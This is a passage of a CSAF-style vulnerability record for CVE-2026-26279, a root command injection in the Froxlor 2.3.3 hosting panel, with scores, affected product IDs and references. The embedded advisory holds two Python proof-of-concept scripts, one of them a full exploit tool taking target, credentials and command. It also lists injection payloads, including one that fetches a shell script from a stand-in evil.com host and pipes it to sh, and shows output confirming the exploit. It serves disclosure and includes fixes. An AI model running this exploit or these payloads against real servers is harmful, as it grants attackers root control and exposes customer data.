(CWE-78)\n\n**File:** `lib/Froxlor/Cron/Http/LetsEncrypt/AcmeSh.php`\n\n```php\n// Line 428\nFileDir::safe_exec(\n    \"wget -O - https://get.acme.sh | sh -s email=\" . Settings::Get('panel.adminmail'),\n    $return,\n    ['|']    // pipe character EXPLICITLY ALLOWED\n);\n```\n\n**What happens:**\n- `Settings::Get('panel.adminmail')` returns the unsanitized value from Bug 1\n- `safe_exec()` normally blocks `|` as a dangerous character\n- But `['|']` in the third argument whitelists pipe for this specific call (needed for `wget | sh`)\n- An attacker's pipe-based payload passes through unblocked\n- The cron job runs as **root**\n\n### The Chain\n\n```\nAdmin sets panel.adminmail = \"x@x.com | COMMAND\"\n        |\n        v\nBug 1: validateFormFieldEmail() does nothing (== typo)\n        |\n        v\nValue stored to database as-is\n        |\n        v\nCron job runs AcmeSh::checkInstall() as root\n        |\n        v\nBug 2: safe_exec(\"wget ... | sh -s email=x@x.com | COMMAND\", ..., ['|'])\n        |\n        v\nCOMMAND executes as root\n```\n\n---\n\n## Proof of Concept\nvuln 1 PoC:\n```\n#!/usr/bin/env python3\n\"\"\"\nVULN-1 Live Verification: Email Validation Bypass\nTests against running Froxlor Docker instance.\n\"\"\"\n\nimport re\nimport sys\nimport requests\n\nTARGET = \"http://localhost:8080\"\nUSERNAME = \"admin\"\nPASSWORD = \"Admin123!@#\"\n\n# Malicious payloads that should be rejected by email validation\n# but will pass due to the == vs = bug\nPAYLOADS = [\n    \"x@x.com | id\",\n    \"x@x.com | curl http://evil.com/shell.sh | sh\",\n    \"not-an-email; whoami\",\n    \"$(touch /tmp/pwned)\",\n    \"test`id`@evil.com\",\n]\n\n\ndef main():\n    session = requests.Session()\n    session.verify = False\n\n    # Step 1: Login\n    print(\"[*] Step 1: Logging in...\")\n    resp = session.get(f\"{TARGET}/index.php\")\n    csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n    csrf_token = csrf_match.group(1) if csrf_match 
else \"\"\n    print(f\"    CSRF token: {csrf_token[:20]}...\")\n\n    login_data = {\n        \"loginname\": USERNAME,\n        \"password\": PASSWORD,\n        \"csrf_token\": csrf_token,\n        \"send\": \"send\",\n    }\n    resp = session.post(f\"{TARGET}/index.php\", data=login_data, allow_redirects=True)\n\n    if \"admin_index\" not in resp.url and \"admin_index\" not in resp.text:\n        print(f\"[-] Login failed. URL: {resp.url}\")\n        print(f\"    Response: {resp.text[:200]}\")\n        sys.exit(1)\n    print(\"[+] Login successful!\")\n\n    # Re-get CSRF token from authenticated page\n    csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n    if csrf_match:\n        csrf_token = csrf_match.group(1)\n\n    # Step 2: Try to set panel.adminmail with each payload\n    for payload in PAYLOADS:\n        print(f\"\\n[*] Testing payload: {payload}\")\n\n        # Get settings page to get fresh CSRF token\n        resp = session.get(f\"{TARGET}/admin_settings.php?page=overview&part=all\")\n        csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n        if csrf_match:\n            csrf_token = csrf_match.group(1)\n\n        # Submit settings change\n        settings_data = {\n            \"panel_adminmail\": payload,\n            \"csrf_token\": csrf_token,\n            \"send\": \"send\",\n            \"page\": \"overview\",\n            \"part\": \"all\",\n        }\n        resp = session.post(\n            f\"{TARGET}/admin_settings.php?page=overview&part=all\",\n            data=settings_data,\n            allow_redirects=True,\n        )\n\n        # Check DB to see if value was stored\n        import subprocess\n        result = subprocess.run(\n            [\n                \"docker\", \"exec\", \"froxlor-web\", \"bash\", \"-c\",\n                \"mysql -h froxlor-db -u froxlor -pfroxlor_db_pw --skip-ssl froxlor \"\n                \"-e \\\"SELECT value FROM panel_settings WHERE 
settinggroup='panel' AND varname='adminmail'\\\" -N 2>/dev/null\"\n            ],\n            capture_output=True, text=True\n        )\n        stored_value = result.stdout.strip()\n\n        if payload in stored_value or stored_value == payload:\n            print(f\"    [VULN] CONFIRMED! Stored value: {stored_value}\")\n        else:\n            print(f\"    [INFO] Stored value: {stored_value}\")\n            print(f\"    [INFO] May need different form field names or approach\")\n\n    # Restore original value\n    print(\"\\n[*] Restoring original admin email...\")\n    resp = session.get(f\"{TARGET}/admin_settings.php?page=overview&part=all\")\n    csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n    if csrf_match:\n        csrf_token = csrf_match.group(1)\n    settings_data = {\n        \"panel_adminmail\": \"admin@test.local\",\n        \"csrf_token\": csrf_token,\n        \"send\": \"send\",\n        \"page\": \"overview\",\n        \"part\": \"all\",\n    }\n    session.post(f\"{TARGET}/admin_settings.php?page=overview&part=all\", data=settings_data, allow_redirects=True)\n    print(\"[+] Done.\")\n\n\nif __name__ == \"__main__\":\n    main()\n\n```\n### Environment\n- Froxlor 2.3.3, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- Default configuration, no modifications\n\n### Step 1: Confirm validation bypass\n\n```php\n<?php\n// Standalone reproduction — no Froxlor installation needed.\n// Reproduces the exact logic from Data.php lines 113-169.\n\nfunction validateEmail_buggy($value) {\n    $fielddata = [];\n    @($fielddata['string_type'] == 'mail');  // BUG: line 169\n    // string_type never set → FILTER_VALIDATE_EMAIL skipped → fallback regex\n    return preg_match('/^[^\\r\\n\\t\\f\\0]*$/D', $value) ? 'PASS' : 'REJECT';\n}\n\nfunction validateEmail_fixed($value) {\n    $fielddata = [];\n    $fielddata['string_type'] = 'mail';      // FIX\n    return filter_var($value, FILTER_VALIDATE_EMAIL) ? 
'PASS' : 'REJECT';\n}\n\n$tests = ['admin@example.com', 'not-an-email', 'x@x.com | touch /tmp/pwned'];\nforeach ($tests as $t) {\n    echo sprintf(\"%-40s  buggy=%-6s  fixed=%s\\n\", $t, validateEmail_buggy($t), validateEmail_fixed($t));\n}\n```\n\nvuln 2 PoC:\n```\n#!/usr/bin/env python3\n\"\"\"\nVULN-2: Froxlor v2.3.3 Root RCE via acme.sh Command Injection\n===============================================================\nCWE-78: OS Command Injection | CVSS 9.1\n\nChain: VULN-1 (email validation bypass) → VULN-2 (acme.sh pipe injection)\n\nAttack Flow:\n  1. Admin sets panel.adminmail = \"x@x.com | COMMAND\" (bypasses email validation)\n  2. When Let's Encrypt is enabled and acme.sh is not installed\n  3. AcmeSh.php:428 executes: wget ... | sh -s email=x@x.com | COMMAND\n  4. Pipe character passes safe_exec() because it's in allowedChars=['|']\n  5. COMMAND runs as root (cron context)\n\nUsage:\n  # Full exploitation (requires target access)\n  python3 vuln2_acmesh_rce.py --target https://froxlor.example.com \\\n      --user admin --password secret --command \"id > /tmp/rce_proof\"\n\n  # Offline demonstration\n  python3 vuln2_acmesh_rce.py --demo\n\"\"\"\n\nimport argparse\nimport re\nimport sys\n\ntry:\n    import requests\nexcept ImportError:\n    print(\"[!] 
pip install requests\")\n    sys.exit(1)\n\n\nBANNER = \"\"\"\n╔═══════════════════════════════════════════════════════════════╗\n║  Froxlor v2.3.3 — Root RCE via acme.sh Command Injection    ║\n║  VULN-1 + VULN-2 Chain | CWE-78 | CVSS 9.1                  ║\n╚═══════════════════════════════════════════════════════════════╝\n\"\"\"\n\n\nclass FroxlorRCE:\n    def __init__(self, target, verify_ssl=False):\n        self.target = target.rstrip(\"/\")\n        self.session = requests.Session()\n        self.session.verify = verify_ssl\n\n    def login(self, username, password):\n        print(f\"[*] Logging in as '{username}'...\")\n        resp = self.session.post(\n            f\"{self.target}/index.php\",\n            data={\"loginname\": username, \"password\": password, \"send\": \"send\"},\n            allow_redirects=False,\n        )\n        if resp.status_code == 302 and \"admin_index\" in resp.headers.get(\"Location\", \"\"):\n            self.session.get(f\"{self.target}/admin_index.php\")\n            print(\"[+] Login successful!\")\n            return True\n        print(\"[-] Login failed\")\n        return False\n\n    def get_csrf(self, url):\n        resp = self.session.get(url)\n        match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n        return match.group(1) if match else \"\"\n\n    def inject_email(self, payload):\n        \"\"\"Inject malicious value into panel.adminmail (VULN-1).\"\"\"\n        print(f\"[*] Injecting into panel.adminmail: {payload}\")\n        csrf = self.get_csrf(f\"{self.target}/admin_settings.php?page=overview&part=panel\")\n        resp = self.session.post(\n            f\"{self.target}/admin_settings.php?page=overview&part=panel\",\n            data={\n                \"csrf_token\": csrf,\n                \"send\": \"send\",\n                \"page\": \"overview\",\n                \"panel_adminmail\": payload,\n            },\n            allow_redirects=True,\n        )\n        
print(f\"[+] Settings updated (HTTP {resp.status_code})\")\n        return resp.status_code == 200\n\n    def trigger_acmesh_install(self):\n        \"\"\"\n        Trigger acme.sh installation by enabling Let's Encrypt\n        and ensuring acme.sh path is invalid.\n        \"\"\"\n        print(\"[*] Triggering acme.sh installation path...\")\n        print(\"[*] In production, this happens automatically when:\")\n        print(\"    - Let's Encrypt is enabled (system.le_froxlor_enabled=1)\")\n        print(\"    - acme.sh binary is not found at configured path\")\n        print(\"    - Cron job runs (every 5 minutes)\")\n        print()\n        print(\"[*] To manually trigger:\")\n        print(\"    docker exec froxlor-web php /var/www/html/froxlor/bin/froxlor-cli froxlor:cron --force\")\n\n    def exploit(self, command):\n        \"\"\"Full exploitation: inject → trigger → RCE.\"\"\"\n        payload = f\"x@x.com | {command}\"\n        self.inject_email(payload)\n\n        print()\n        print(\"[*] Command chain that will execute as root:\")\n        print(f\"    wget -O - https://get.acme.sh | sh -s email={payload}\")\n        print()\n        print(\"[*] This decomposes to:\")\n        print(f\"    1. wget -O - https://get.acme.sh\")\n        print(f\"    2. | sh -s email=x@x.com\")\n        print(f\"    3. 
| {command}\")\n        print()\n\n        self.trigger_acmesh_install()\n\n    def restore(self, original=\"admin@test.local\"):\n        \"\"\"Restore original admin email.\"\"\"\n        print(f\"\\n[*] Restoring original email: {original}\")\n        csrf = self.get_csrf(f\"{self.target}/admin_settings.php?page=overview&part=panel\")\n        self.session.post(\n            f\"{self.target}/admin_settings.php?page=overview&part=panel\",\n            data={\n                \"csrf_token\": csrf,\n                \"send\": \"send\",\n                \"page\": \"overview\",\n                \"panel_adminmail\": original,\n            },\n        )\n        print(\"[+] Restored\")\n\n\ndef demo():\n    \"\"\"Offline demonstration of the vulnerability mechanics.\"\"\"\n    print(\"[*] Demonstrating VULN-2 mechanics (offline)...\\n\")\n\n    adminmail = \"x@x.com | touch /tmp/ROOT_RCE_PROOF\"\n    full_cmd = f\"wget -O - https://get.acme.sh | sh -s email={adminmail}\"\n\n    print(f\"  admin email:  {adminmail}\")\n    print(f\"  full command: {full_cmd}\")\n    print()\n\n    # Simulate safe_exec filter\n    disallowed = [';', '|', '&', '>', '<', '`', '$', '~', '?']\n    allowed_chars = ['|']\n\n    print(\"  safe_exec() filter check:\")\n    blocked = False\n    for char in disallowed:\n        if char in full_cmd:\n            if char in allowed_chars:\n                print(f\"    '{char}' → ALLOWED (in allowedChars)\")\n            else:\n                print(f\"    '{char}' → BLOCKED\")\n                blocked = True\n\n    print()\n    if not blocked:\n        print(\"  RESULT: Command passes safe_exec() filter!\")\n        print(\"  The pipe character chains our command after the wget/sh pipeline\")\n        print()\n        print(\"  Execution breakdown:\")\n        print(\"    Process 1: wget downloads acme.sh installer\")\n        print(\"    Process 2: sh runs installer with email parameter\")\n        print(\"    Process 3: touch /tmp/ROOT_RCE_PROOF ← 
OUR COMMAND (as root)\")\n    else:\n        # In practice the payload above should only have | which is allowed\n        print(\"  NOTE: Some characters blocked. Adjust payload to use only pipe.\")\n\n    print()\n    print(\"  NOTE: The cron job runs as root, so the injected command\")\n    print(\"  executes with root privileges on the host system.\")\n\n\ndef main():\n    print(BANNER)\n\n    parser = argparse.ArgumentParser(description=\"Froxlor v2.3.3 Root RCE PoC\")\n    parser.add_argument(\"--target\", \"-t\", help=\"Froxlor URL\")\n    parser.add_argument(\"--user\", \"-u\", help=\"Admin username\")\n    parser.add_argument(\"--password\", \"-p\", help=\"Admin password\")\n    parser.add_argument(\"--command\", \"-c\", default=\"touch /tmp/ROOT_RCE_PROOF\",\n                        help=\"Command to execute as root\")\n    parser.add_argument(\"--restore\", action=\"store_true\", help=\"Restore original email after exploit\")\n    parser.add_argument(\"--demo\", action=\"store_true\", help=\"Run offline demonstration\")\n    args = parser.parse_args()\n\n    if args.demo:\n        demo()\n        return\n\n    if not all([args.target, args.user, args.password]):\n        print(\"[!] 
--target, --user, and --password required (or use --demo)\")\n        sys.exit(1)\n\n    exploit = FroxlorRCE(args.target)\n    if not exploit.login(args.user, args.password):\n        sys.exit(1)\n\n    exploit.exploit(args.command)\n\n    if args.restore:\n        exploit.restore()\n\n\nif __name__ == \"__main__\":\n    main()\n\n```\n\n**Output:**\n```\nadmin@example.com                         buggy=PASS    fixed=PASS\nnot-an-email                              buggy=PASS    fixed=REJECT\nx@x.com | touch /tmp/pwned               buggy=PASS    fixed=REJECT\n```\n\n### Step 2: Confirm value stored in database\n\n```\nPOST /admin_settings.php?page=overview&part=panel HTTP/1.1\nCookie: [authenticated admin session]\n\ncsrf_token=...&send=send&page=overview&panel_adminmail=x@x.com+|+touch+/tmp/VULN2_RCE_PROOF\n```\n\n```sql\nmysql> SELECT value FROM panel_settings\n       WHERE settinggroup='panel' AND varname='adminmail';\n+-------------------------------------------+\n| value                                     |\n+-------------------------------------------+\n| x@x.com | touch /tmp/VULN2_RCE_PROOF     |\n+-------------------------------------------+\n```\n\n### Step 3: Confirm root code execution\n\nSimulating AcmeSh.php line 428 inside the Docker container:\n\n```php\n<?php\n// Exact simulation of the vulnerable code path\n$adminmail = \"x@x.com | touch /tmp/VULN2_RCE_PROOF\";\n$cmd = \"echo DOWNLOAD_SIM | cat -s email=\" . $adminmail;\n\n// safe_exec filter with pipe allowed (matches AcmeSh.php:428)\n$disallowed = [';', '|', '&', '>', '<', '`', '$', '~', '?'];\n$allowedChars = ['|'];\nforeach ($disallowed as $dc) {\n    if (in_array($dc, $allowedChars)) continue;\n    if (stristr($cmd, $dc)) die(\"BLOCKED by: $dc\");\n}\n\nexec($cmd);  // pipe passes filter → command executes\necho file_exists(\"/tmp/VULN2_RCE_PROOF\") ? 
\"RCE CONFIRMED\" : \"NOT CREATED\";\n```\n\n**Result:**\n```\nRCE CONFIRMED\n\n$ ls -la /tmp/VULN2_RCE_PROOF\n-rw-r--r-- 1 root root 0 Feb 11 05:58 /tmp/VULN2_RCE_PROOF\n```\n\nFile created with **root:root** ownership. Arbitrary command execution as root is confirmed.\n\n---\n\n## Impact\n\n- **Confidentiality:** Complete. Root access exposes all customer data, databases, SSL private keys, email contents.\n- **Integrity:** Complete. Attacker can modify any file, inject backdoors, alter DNS records.\n- **Availability:** Complete. Attacker can destroy the server, wipe databases, or deploy ransomware.\n- **Scope:** Changed. The attack originates in the web application but impacts the underlying operating system.\n\n---\n\n## Suggested Fix\n\n### Primary fix (Bug 1 — eliminates the root cause):\n```php\n// lib/Froxlor/Validate/Form/Data.php\n// Line 169:\n$fielddata['string_type'] = 'mail';    // was: == 'mail'\n// Line 175:\n$fielddata['string_type'] = 'url';     // was: == 'url'\n```\n\n### Defense-in-depth (Bug 2 — even if validation is fixed):\n```php\n// lib/Froxlor/Cron/Http/LetsEncrypt/AcmeSh.php, Line 428:\nFileDir::safe_exec(\n    \"wget -O - https://get.acme.sh | sh -s email=\"\n        . escapeshellarg(Settings::Get('panel.adminmail')),\n    $return,\n    ['|']\n);\n```\n\n### Defense-in-depth (ConfigServices.php):\n```php\n// All values in getReplacerArray() should be escaped with\n// escapeshellarg() when the template action type is \"install\" or \"command\"\n```",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-33mp-8p67-xj7c.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00584",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.1",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product data available from source Certbundde",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "The CVSS vector string contains A:H (Availability Impact: High); there is exploit data available from source Nvd; the vulnerability is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5755795",
                    "CSAFPID-5757222",
                    "CSAFPID-533784",
                    "CSAFPID-533785",
                    "CSAFPID-533786",
                    "CSAFPID-533787",
                    "CSAFPID-533788",
                    "CSAFPID-533789",
                    "CSAFPID-533790",
                    "CSAFPID-533791",
                    "CSAFPID-533792",
                    "CSAFPID-533794",
                    "CSAFPID-533795",
                    "CSAFPID-533796",
                    "CSAFPID-533797",
                    "CSAFPID-533799",
                    "CSAFPID-533800",
                    "CSAFPID-533801",
                    "CSAFPID-584149",
                    "CSAFPID-586038",
                    "CSAFPID-586039",
                    "CSAFPID-586040",
                    "CSAFPID-586041",
                    "CSAFPID-586042",
                    "CSAFPID-586043",
                    "CSAFPID-810703",
                    "CSAFPID-810704",
                    "CSAFPID-810705",
                    "CSAFPID-810706",
                    "CSAFPID-810707",
                    "CSAFPID-810708",
                    "CSAFPID-810709",
                    "CSAFPID-810710",
                    "CSAFPID-810711",
                    "CSAFPID-810712",
                    "CSAFPID-810713",
                    "CSAFPID-810714",
                    "CSAFPID-810715",
                    "CSAFPID-810716",
                    "CSAFPID-810717",
                    "CSAFPID-810718",
                    "CSAFPID-810719",
                    "CSAFPID-810720",
                    "CSAFPID-810721",
                    "CSAFPID-835393",
                    "CSAFPID-835394",
                    "CSAFPID-835395",
                    "CSAFPID-835396",
                    "CSAFPID-876013",
                    "CSAFPID-876014",
                    "CSAFPID-876015",
                    "CSAFPID-876016",
                    "CSAFPID-876017",
                    "CSAFPID-876018",
                    "CSAFPID-876019",
                    "CSAFPID-876020",
                    "CSAFPID-877915",
                    "CSAFPID-877916",
                    "CSAFPID-879533",
                    "CSAFPID-882822",
                    "CSAFPID-882823",
                    "CSAFPID-897815",
                    "CSAFPID-945280",
                    "CSAFPID-945281",
                    "CSAFPID-945282",
                    "CSAFPID-945283",
                    "CSAFPID-945284",
                    "CSAFPID-945285",
                    "CSAFPID-945396",
                    "CSAFPID-945397",
                    "CSAFPID-1015398",
                    "CSAFPID-1015399",
                    "CSAFPID-1095067",
                    "CSAFPID-1095068",
                    "CSAFPID-1095069",
                    "CSAFPID-1095070",
                    "CSAFPID-1095071",
                    "CSAFPID-1095072",
                    "CSAFPID-1095073",
                    "CSAFPID-2486098",
                    "CSAFPID-2486099",
                    "CSAFPID-2486100",
                    "CSAFPID-2486101",
                    "CSAFPID-2486102",
                    "CSAFPID-2486103",
                    "CSAFPID-3452625",
                    "CSAFPID-3452626",
                    "CSAFPID-3765852",
                    "CSAFPID-3765853",
                    "CSAFPID-3765854",
                    "CSAFPID-3765855",
                    "CSAFPID-3765856",
                    "CSAFPID-3765857",
                    "CSAFPID-3765858",
                    "CSAFPID-3765859",
                    "CSAFPID-3765860",
                    "CSAFPID-4979442",
                    "CSAFPID-4979443",
                    "CSAFPID-4979444",
                    "CSAFPID-5574732",
                    "CSAFPID-5574733",
                    "CSAFPID-5574734",
                    "CSAFPID-5574735",
                    "CSAFPID-5574736",
                    "CSAFPID-5574737",
                    "CSAFPID-5574738",
                    "CSAFPID-5574739",
                    "CSAFPID-5759017"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0577.json"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-33mp-8p67-xj7c"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-33mp-8p67-xj7c"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26279"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-26279"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-26279"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/26xxx/CVE-2026-26279.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26279"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-33mp-8p67-xj7c.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0577.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0577"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-33mp-8p67-xj7c"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/froxlor/Froxlor/security/advisories/GHSA-33mp-8p67-xj7c"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.4"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-33mp-8p67-xj7c"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/froxlor/froxlor/commit/22249677107f8f39f8d4a238605641e87dab4343"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26279"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                        "baseScore": 9.1,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-1015398",
                        "CSAFPID-1015399",
                        "CSAFPID-1095067",
                        "CSAFPID-1095068",
                        "CSAFPID-1095069",
                        "CSAFPID-1095070",
                        "CSAFPID-1095071",
                        "CSAFPID-1095072",
                        "CSAFPID-1095073",
                        "CSAFPID-2486098",
                        "CSAFPID-2486099",
                        "CSAFPID-2486100",
                        "CSAFPID-2486101",
                        "CSAFPID-2486102",
                        "CSAFPID-2486103",
                        "CSAFPID-3452625",
                        "CSAFPID-3452626",
                        "CSAFPID-3765852",
                        "CSAFPID-3765853",
                        "CSAFPID-3765854",
                        "CSAFPID-3765855",
                        "CSAFPID-3765856",
                        "CSAFPID-3765857",
                        "CSAFPID-3765858",
                        "CSAFPID-3765859",
                        "CSAFPID-3765860",
                        "CSAFPID-4979442",
                        "CSAFPID-4979443",
                        "CSAFPID-4979444",
                        "CSAFPID-533784",
                        "CSAFPID-533785",
                        "CSAFPID-533786",
                        "CSAFPID-533787",
                        "CSAFPID-533788",
                        "CSAFPID-533789",
                        "CSAFPID-533790",
                        "CSAFPID-533791",
                        "CSAFPID-533792",
                        "CSAFPID-533794",
                        "CSAFPID-533795",
                        "CSAFPID-533796",
                        "CSAFPID-533797",
                        "CSAFPID-533799",
                        "CSAFPID-533800",
                        "CSAFPID-533801",
                        "CSAFPID-5574732",
                        "CSAFPID-5574733",
                        "CSAFPID-5574734",
                        "CSAFPID-5574735",
                        "CSAFPID-5574736",
                        "CSAFPID-5574737",
                        "CSAFPID-5574738",
                        "CSAFPID-5574739",
                        "CSAFPID-5755795",
                        "CSAFPID-5757222",
                        "CSAFPID-5759017",
                        "CSAFPID-584149",
                        "CSAFPID-586038",
                        "CSAFPID-586039",
                        "CSAFPID-586040",
                        "CSAFPID-586041",
                        "CSAFPID-586042",
                        "CSAFPID-586043",
                        "CSAFPID-810703",
                        "CSAFPID-810704",
                        "CSAFPID-810705",
                        "CSAFPID-810706",
                        "CSAFPID-810707",
                        "CSAFPID-810708",
                        "CSAFPID-810709",
                        "CSAFPID-810710",
                        "CSAFPID-810711",
                        "CSAFPID-810712",
                        "CSAFPID-810713",
                        "CSAFPID-810714",
                        "CSAFPID-810715",
                        "CSAFPID-810716",
                        "CSAFPID-810717",
                        "CSAFPID-810718",
                        "CSAFPID-810719",
                        "CSAFPID-810720",
                        "CSAFPID-810721",
                        "CSAFPID-835393",
                        "CSAFPID-835394",
                        "CSAFPID-835395",
                        "CSAFPID-835396",
                        "CSAFPID-876013",
                        "CSAFPID-876014",
                        "CSAFPID-876015",
                        "CSAFPID-876016",
                        "CSAFPID-876017",
                        "CSAFPID-876018",
                        "CSAFPID-876019",
                        "CSAFPID-876020",
                        "CSAFPID-877915",
                        "CSAFPID-877916",
                        "CSAFPID-879533",
                        "CSAFPID-882822",
                        "CSAFPID-882823",
                        "CSAFPID-897815",
                        "CSAFPID-945280",
                        "CSAFPID-945281",
                        "CSAFPID-945282",
                        "CSAFPID-945283",
                        "CSAFPID-945284",
                        "CSAFPID-945285",
                        "CSAFPID-945396",
                        "CSAFPID-945397"
                    ]
                }
            ],
            "title": "CVE-2026-26279"
        }
    ]
}